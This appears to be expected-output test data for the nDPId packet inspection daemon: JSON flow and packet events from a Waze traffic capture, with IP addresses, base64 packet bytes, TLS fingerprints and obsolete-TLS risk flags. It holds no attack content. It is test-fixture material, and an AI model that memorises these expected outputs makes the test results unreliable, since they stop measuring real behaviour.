-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1435587879850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587879850,"pkt":"ABoRAAACABoRAAABCABFAAA8Fw9AAEAGrs0KCAABsCK6tI3cAbueIGdrAAAAAKAC\/\/\/NjwAAAgQFtAQCCAoACHBkAAAAAAEDAwg="} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1435587879852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879852,"pkt":"ABoRAAACABoRAAABCABFAAAodS5AABAGgMKwIrq0CggAAQG7jdxh35iUniBnbFAS\/\/+rWgAA"} 
-00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1435587879853,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879853,"pkt":"ABoRAAACABoRAAABCABFAAAoFxBAAEAGruAKCAABsCK6tI3cAbueIGdsYd+YlVAQ\/\/+rWwAA"} -01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":396,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587879018,"flow_last_seen":1435587879855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587879855,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} 
-01254{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":398,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587879018,"flow_last_seen":1435587879907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587879907,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":400,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587879850,"flow_last_seen":1435587879958,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587879958,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01254{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":428,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587879850,"flow_last_seen":1435587880568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3491,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1435587880568,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} 
-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880576,"flow_last_seen":1435587880576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880576,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.31","src_port":43991,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1435587880576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1435587880576,"pkt":"ABoRAAACABoRAAABCABFAAA0U4FAAEAG6tYKECWdyKAEH6vXAFAtnZBdDlnt+YARAVu2DAAAAQEICgAIcK6K\/GDA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1435587880577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880577,"pkt":"ABoRAAACABoRAAABCABFAAAodUFAABAG+SLIoAQfChAlnQBQq9cOWe35LZ2QXlAQ\/\/9M8gAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1435587880577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880577,"pkt":"ABoRAAACABoRAAABCABFAAAodUJAABAG+SHIoAQfChAlnQBQq9cOWe35LZ2QXlAR\/\/9M8QAA"} 
-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880577,"flow_last_seen":1435587880577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880577,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":46473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1435587880577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1435587880577,"pkt":"ABoRAAACABoRAAABCABFAAA0OqdAAEAGA58KECWdyKAEMbWJAFDzNuhArgf0IIARAVuhgQAAAQEICgAIcK4TbB\/F"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1435587880578,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880578,"pkt":"ABoRAAACABoRAAABCABFAAAodUNAABAG+Q7IoAQxChAlnQBQtYmuB\/Qg8zboQVAQ\/\/9\/2wAA"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1435587880578,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880578,"pkt":"ABoRAAACABoRAAABCABFAAAodURAABAG+Q3IoAQxChAlnQBQtYmuB\/Qg8zboQVAR\/\/9\/2gAA"} 
-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":438,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880578,"flow_last_seen":1435587880578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880578,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":41823,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1435587880578,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1435587880578,"pkt":"ABoRAAACABoRAAABCABFAAA04rRAAEAGW5EKECWdyKAEMaNfAFDGgz5oQX0A9YARAVvp7QAAAQEICgAIcK4TbB\/F"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1435587880579,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880579,"pkt":"ABoRAAACABoRAAABCABFAAAodUVAABAG+QzIoAQxChAlnQBQo19BfQD1xoM+aVAQ\/\/\/IRwAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1435587880579,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880579,"pkt":"ABoRAAACABoRAAABCABFAAAodUZAABAG+QvIoAQxChAlnQBQo19BfQD1xoM+aVAR\/\/\/IRgAA"} 
-00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880579,"flow_last_seen":1435587880579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880579,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":45169,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1435587880579,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880579,"pkt":"ABoRAAACABoRAAABCABFAAAohIxAAEAG3tQKCAAByKAExrBxAFBvlik9kGnb21AR\/\/8iigAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1435587880580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880580,"pkt":"ABoRAAACABoRAAABCABFAAAodUdAABAGHhrIoATGCggAAQBQsHGQadvbb5YpPlAQ\/\/8iigAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1435587880580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880580,"pkt":"ABoRAAACABoRAAABCABFAAAodUhAABAGHhnIoATGCggAAQBQsHGQadvbb5YpPlAR\/\/8iiQAA"} 
-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880580,"flow_last_seen":1435587880580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880580,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52953,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1435587880580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1435587880580,"pkt":"ABoRAAACABoRAAABCABFAAA0VK5AAEAG6ZcKECWdyKAEMc7ZAFAfHIxhueqe64ARAVv9kwAAAQEICgAIcK4TbCOv"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1435587880580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880580,"pkt":"ABoRAAACABoRAAABCABFAAAodUlAABAG+QjIoAQxChAlnQBQztm56p7rHxyMYlAQ\/\/\/f1wAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1435587880581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880581,"pkt":"ABoRAAACABoRAAABCABFAAAodUpAABAG+QfIoAQxChAlnQBQztm56p7rHxyMYlAR\/\/\/f1gAA"} 
-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880581,"flow_last_seen":1435587880581,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880581,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52746,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1435587880581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1435587880581,"pkt":"ABoRAAACABoRAAABCABFAAA02RhAAEAGZS0KECWdyKAEMc4KAFB1GwfcXT3HdoARAVthCwAAAQEICgAIcK4TbCOv"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1435587880582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880582,"pkt":"ABoRAAACABoRAAABCABFAAAodUtAABAG+QbIoAQxChAlnQBQzgpdPcd2dRsH3VAQ\/\/9DTwAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1435587880582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880582,"pkt":"ABoRAAACABoRAAABCABFAAAodUxAABAG+QXIoAQxChAlnQBQzgpdPcd2dRsH3VAR\/\/9DTgAA"} 
-00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880583,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880583,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60574,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880583,"pkt":"ABoRAAACABoRAAABCABFAAAo9fdAAEAGbf4KCAAByKAEMeyeAFAiBCaW3fvegVAR\/\/\/m8gAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1435587880586,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880586,"pkt":"ABoRAAACABoRAAABCABFAAAodU1AABAGHqnIoAQxCggAAQBQ7J7d+96BIgQml1AQ\/\/\/m8gAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1435587880587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880587,"pkt":"ABoRAAACABoRAAABCABFAAAodU5AABAGHqjIoAQxCggAAQBQ7J7d+96BIgQml1AR\/\/\/m8QAA"} 
-00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":457,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880587,"flow_last_seen":1435587880587,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880587,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":43089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1435587880587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880587,"pkt":"ABoRAAACABoRAAABCABFAAAoE7JAAEAGT68KCAAByKAExqhRAbtmrsLcmVFRdFAR\/\/8aBwAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1435587880588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880588,"pkt":"ABoRAAACABoRAAABCABFAAAodU9AABAGHhLIoATGCggAAQG7qFGZUVF0Zq7C3VAQ\/\/8aBwAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1435587880588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880588,"pkt":"ABoRAAACABoRAAABCABFAAAodVBAABAGHhHIoATGCggAAQG7qFGZUVF0Zq7C3VAR\/\/8aBgAA"} 
-00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880589,"flow_last_seen":1435587880589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880589,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1435587880589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880589,"pkt":"ABoRAAACABoRAAABCABFAAAoS15AAEAGGJgKCAAByKAEMew\/Abump6BqWVh1BVAR\/\/\/VjgAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1435587880589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880589,"pkt":"ABoRAAACABoRAAABCABFAAAodVJAABAGHqTIoAQxCggAAQG77D9ZWHUFpqega1AQ\/\/\/VjgAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1435587880589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880589,"pkt":"ABoRAAACABoRAAABCABFAAAodVNAABAGHqPIoAQxCggAAQG77D9ZWHUFpqega1AR\/\/\/VjQAA"} 
-00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":532,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587894241,"flow_last_seen":1435587894241,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587894241,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1435587894241,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587894241,"pkt":"ABoRAAACABoRAAABCABFAAA87+5AAEAGZNsKCAABLjOtto0mAbvDfJnqAAAAAKAC\/\/\/\/twAAAgQFtAQCCAoACHYEAAAAAAEDAwg="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":533,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1435587894244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587894244,"pkt":"ABoRAAACABoRAAABCABFAAAodXFAABAGD20uM622CggAAQG7jSY8g2YVw3yZ61AS\/\/86\/gAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1435587894244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587894244,"pkt":"ABoRAAACABoRAAABCABFAAAo7+9AAEAGZO4KCAABLjOtto0mAbvDfJnrPINmFlAQ\/\/86\/wAA"} 
